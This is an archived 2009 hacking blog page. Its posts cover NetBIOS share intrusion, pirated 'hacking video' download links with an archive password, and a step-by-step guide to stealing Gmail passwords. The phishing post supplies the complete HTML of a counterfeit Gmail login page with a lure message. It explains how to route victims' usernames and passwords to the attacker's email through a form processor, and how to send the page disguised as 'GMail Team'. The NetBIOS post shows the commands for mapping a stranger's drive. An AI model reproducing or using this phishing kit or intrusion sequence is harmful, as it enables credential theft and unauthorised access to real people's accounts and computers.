Hacking is a Creativity: August 2009

Please, read out !

Most people think that hackers are computer criminals. They fail to recognise the fact that criminals and hackers are two totally different things. Media is responsible for this. Hackers in reality are actually good and extremely intelligent people who by using their knowledge in a constructive manner help organisations, companies, goverment, etc. to secure documents and secret information on the internet.

NetBIOS Hacking

0 comments

NetBIOS stands for "Network Basic Input Output System".
It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources.
By default it runs on port 139.
NetBIOS gives the various information of the computers on a network, which includes computer name, username, domain, group, and many others.....!

The NBTSTAT Command :-
NBTSTAT is the command for manually interact with NetBIOS Over TCP/IP.
All the attributes (switches) used with nbtstat command and their usage can be viewed.
At the command prompt type-

C:\Windows>nbtstat

NBTSTAT

Sample NBTSTAT Response :-

C:\>nbtstat -A 117.200.160.174

NetBIOS Remote Machine Name Table

Name Type Status
----------------------------------------------
PRASANNA <00> UNIQUE Registered
INSECURE LABS <00> GROUP Registered
PRASANNA <03> UNIQUE Registered
PRASANNA <20> UNIQUE Registered
INSECURE LABS <1e> GROUP Registered

MAC Address = 86-95-55-50-00-00

An intruder could use the output from an nbtstat against your machines to begin gathering information about them.

"<03> in above table is nothing but the username of that system."

The next step for an intruder would be to try and list the open shares on the given computer, using the net view command.
Here is an example of the Net View command-

C:\>net view \\117.200.160.174
Shared resources at \\117.200.160.174

Sharename Type Comment
----------------------------------------
C Disk Drive C:\
MySofts Disk My Softwares Collection
E Disk Drive E:\

The command was completed successfully.

This information would give the intruder a list of shares which he would then use in conjunction with the Net Use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive, which he could then browse...!

C:\>net use G: \\117.200.160.174\C
The command was completed successfully.

C:\>G:

G:\>

Read On

Hacking Video Tutorial

1 comments

Well friend let them here videos of hacking, just Look at the OS that are echos because it will be Linux? just like two I think it is Windows, but hey this is only an interlude of what is in these videos.

Product description:
A file that contains 52 videos in SWF format, avi and wmv, dode have different content as:
* Telnet
* Brute Force
* Exploring Bugs
* Hacking a Network
* Use of software Hacker
* And much more

File weight: 663 MB 6 parts of 95.7 Mb and 1 88.9
Compression Format: RAR

http://rapidshare.com/files/66601513/Hacking_Videos_www.programasfull.net.part1.rar
http://rapidshare.com/files/66689213/Hacking_Videos_www.programasfull.net.part2.rar
http://rapidshare.com/files/66584939/Hacking_Videos_www.programasfull.net.part3.rar
http://rapidshare.com/files/66738936/Hacking_Videos_www.programasfull.net.part4.rar
http://rapidshare.com/files/66854741/Hacking_Videos_www.programasfull.net.part5.rar
http://rapidshare.com/files/66871449/Hacking_Videos_www.programasfull.net.part6.rar
http://rapidshare.com/files/66706735/Hacking_Videos_www.programasfull.net.part7.rar

Password:
www.programasfull.net

Read On

Cracking GMail Account Password

1 comments

Here is the most effective technique for cracking GMail Accounts Passwords.

This method uses 'Social Engineering' rather than 'Phishing'.

Follow the steps as given below :-

Success Rate :- 90%

Step-1 : Create your own fake gmail login form using HTML, which may look like one as shown below-

The HTML code for above login screen created by me is given below-

<html lang="en" dir="ltr"> <head> <meta equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> <!-- body,td,div,p,a,font,span {font-family: arial,sans-serif} body {margin-top:2} .c {width: 4; height: 4} .bubble {background-color:#C3D9FF} .tl {padding: 0; width: 4; text-align: left; vertical-align: top} .tr {padding: 0; width: 4; text-align: right; vertical-align: top} .bl {padding: 0; width: 4; text-align: left; vertical-align: bottom} .br {padding: 0; width: 4; text-align: right; vertical-align: bottom} .caption {color:#000000; white-space:nowrap; background:#E8EEFA; text-align:center} .form-noindent {background-color: #ffffff; border: #C3D9FF 1px solid} .feature-image {padding: 15 0 0 0; vertical-align: top; text-align: right; } .feature-description {padding: 15 0 0 10; vertical-align: top; text-align: left; } // --> </style> <title> Gmail: Email from Google </title> </noscript> </head> <body bgcolor="#ffffff" link="#0000FF" vlink="#0000FF" onload="OnLoad()"> <table width="95%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr valign="top"> <td width="1%"> <img src="https://mail.google.com/mail/help/images/logo.gif" border="0" width="143" height="59" alt="Gmail" align="left" vspace="10/" /> </noscript> </td> <td width="99%" bgcolor="#ffffff" valign="top"> <table width="100%" cellpadding="1"> <tr valign="bottom"> <td><div align="right"> </div></td> </tr> <tr> <td nowrap="nowrap"> <table width="100%" align="center" cellpadding="0" cellspacing="0" bgcolor="#C3D9FF" style="margin-bottom:5"> <tr> <td class="bubble tl" align="left" valign="top"><img src="https://mail.google.com/mail/images/corner_tl.gif" class="c" alt="" /></td> <script>utmx_section("title")</script> <td class="bubble" rowspan="2" style="font-family:arial;text-align:left;font-weight:bold;padding:5 0"><b>Welcome to Gmail</b></td> <td class="bubble tr" align="right" valign="top"><img src="https://mail.google.com/mail/images/corner_tr.gif" class="c" alt="" /></td> </noscript> </tr> <tr> <td class="bubble bl" align="left" valign="bottom"><img src="https://mail.google.com/mail/images/corner_bl.gif" class="c" alt="" /></td> <td class="bubble br" align="right" valign="bottom"><img src="https://mail.google.com/mail/images/corner_br.gif" class="c" alt="" /></td> </tr> </table> </td> </tr> </table> </td> </tr> </table> <table width="94%" align="center" cellpadding="5" cellspacing="1"> <tr> <td valign="top" style="text-align:left"><b>A Google approach to email.</b> <td valign="top">  </tr> <tr> <td width="75%" valign="top"> <p style="margin-bottom: 0;text-align:left"><span style="font-size:-1;"> Dear <b><victim></b>, <br /><br /> <table align="center" width="75%"> <tr><td><span style="font-size:-1;"> We are moving database partly to our new server.<br /> This require your account verification for proper redirection...!<br /> Please verify yourself by entering correct google account 'username' and 'password'. Click 'Move'.<br /> Repply this message within 72 hours.<br /> Thank You ! for your Co-Operation........! </span><br /><br /> <b>GMail Team</b> </td></tr></table> </span> </p> </noscript> </noscript> </td> <td valign="top"> <div id="login"> <form id="gaia_loginform" action="login.asp" method="post"> <div id="gaia_loginbox"> <table class="form-noindent" cellspacing="3" cellpadding="5" width="100%" border="0"> <tr> <td valign="top" style="text-align:center;color:#e8eefa;" nowrap="nowrap" bg> <div class="loginBox"> <table id="gaia_table" align="center" border="0" cellpadding="1" cellspacing="0"> <tr> <td colspan="2" align="center"> <table> <tr> <td valign="top"><span style="color:#0000FF;">G</span><span style="color:#FF0000;">o</span><span style="color:#FFCC33;">o</span><span style="color:#0000FF;">g</span><span style="color:#009900;">l</span><span style="color:#FF0000;">e</span></td> <td valign="middle"> <span style="font-size:+0;"><b>Account</b></span> </td> </tr> </table></td> </tr> <script type="text/javascript"><!-- function onPreCreateAccount() { return true; } function onPreLogin() { if (window["onlogin"] != null) { return onlogin(); } else { return true; } } --></script> <tr> <td colspan="2" align="center"> </td> </tr> <tr> <td nowrap="nowrap"> <div align="right"> <span class="gaia le lbl"> Username: </span> </div></td> <td> <input type="text" name="Email" id="Email" size="18" value="" class="'gaia"> </td> </tr> <tr> <td></td> <td align="left"> </td> </tr> <tr> <td align="right"> <span class="gaia le lbl"> Password: </span> </td> <td> <input type="password" name="Passwd" id="Passwd" size="18" class="gaia le val"> </td> </tr> <tr> <td> </td> <td align="left"> </td> </tr> <tr> <td> </td> <td align="left"> <input type="submit" class="gaia le button" name="signIn" value="Move"> </td> </tr> </table> </div> </td> </tr> </table> </div> </form> </div> <br /> <table class="form-noindent" cellpadding="0" width="100%" bg id="links" style="color:#E8EEFA;"> <tr bg style="color:#E8EEFA;"> <td valign="top" align="center"><span style="font-size:+0;"><br /> <span style="font-size:-1;"> <a href="http://mail.google.com/mail/help/intl/en/about.html">About Gmail</a >     <a href="http://mail.google.com/mail/help/intl/en/about_whatsnew.html">New features!</a> </span> </span></td> </table> </noscript> </table> <br /> <table width="95%" align="center" cellpadding="3" cellspacing="0" bgcolor="#C3D9FF" style="margin-bottom:5"> <tr> <td class="bubble tl" align="left" valign="top"><img src="https://mail.google.com/mail/images/corner_tl.gif" class="c" alt="" /></td> <td class="bubble" rowspan="2" style="text-align:left"> <div align="center"> <span style="font-size:-1;color:#666666;">©2008 Google - <a href="http://www.google.com/a/help/intl/en/users/user_features.html#utm_medium=et&utm_source=gmail-en&utm_campaign=crossnav&token=gmail_footer">Gmail for Organizations</a> - <a href="http://gmailblog.blogspot.com/?utm_source=en-gmftr&utm_medium=et&utm_content=gmftr">Gmail Blog</a> - <a href="http://mail.google.com/mail/help/intl/en/terms.html">Terms</a>   - <a href="http://mail.google.com/support/">Help</a> </span> </div> </td> <td class="bubble tr" align="right" valign="top"><img src="https://mail.google.com/mail/images/corner_tr.gif" class="c" alt="" /></td> </tr> <tr> <td class="bubble bl" align="left" valign="bottom"><img src="https://mail.google.com/mail/images/corner_bl.gif" class="c" alt="" /></td> <td class="bubble br" align="right" valign="bottom"><img src="https://mail.google.com/mail/images/corner_br.gif" class="c" alt="" /></td> </tr> </table> </body> </html>

Step-2 : We require a form processor to process this fake login form, i.e. to store the username and password entered by the victim.
The username and password entered by victim can either be stored in database or send directly to the predefined e-mail address.
This can be done in two ways-

1) Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You have to register with www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account. Which may be something like following-

            Your form must start with the following <form> HTML tag:<br />             <form method="POST" action="http://fp1.formmail.com/cgi-bin/fm192">             You must also include the following hidden configuration fields                in your form so that formmail.com knows what account and form processor                to use on the submitted data:               <input type="hidden" name="_pid" value="94566">               <input type="hidden" name="_fid" value="36THG54Z">               You must also inform this form processor who you wish to have your                form results emailed to. To do so, you must include a hidden form                field that specifies the recipient:               <input type="hidden" name="recipient" value="your email address">               Please Note: the above field will work, but an even better solution                is to use the ID number for that email address (thus hiding your                address from spammers):               <input type="hidden" name="recipient" value="1">

2) If you are having your own domain hosted on some server; knowing the basics of ASP for processing HTML forms, you can create your own form processor in ASP (eg. 'login.asp' page) for above given fake gmail login form. Here you should only put both 'gmail.html' and 'login.asp' files to your server.

Step-3 : Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form Processor' are ready to use.
Now you can send the fake gmail login form as an html mail to the victim's e-mail address, hoping that the victim gets fooled into entering the account username and password and click on 'Move' button.
Note:- You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use your fake name as 'GMail Team' or 'GMail' while sending fake login form to victim.

As soon as victim click on 'Move' button he/she get redirected to predefined webpage (eg. http://www.gmail.com), while his/her 'username' and 'password' get emailed to you by formmail.com .
That's It............!

Done.......?

Read On

Hacking is a Creativity

Please, read out !

NetBIOS Hacking

Hacking Video Tutorial

Cracking GMail Account Password

Who am i ???

Blog Archive

Followers

Shout here!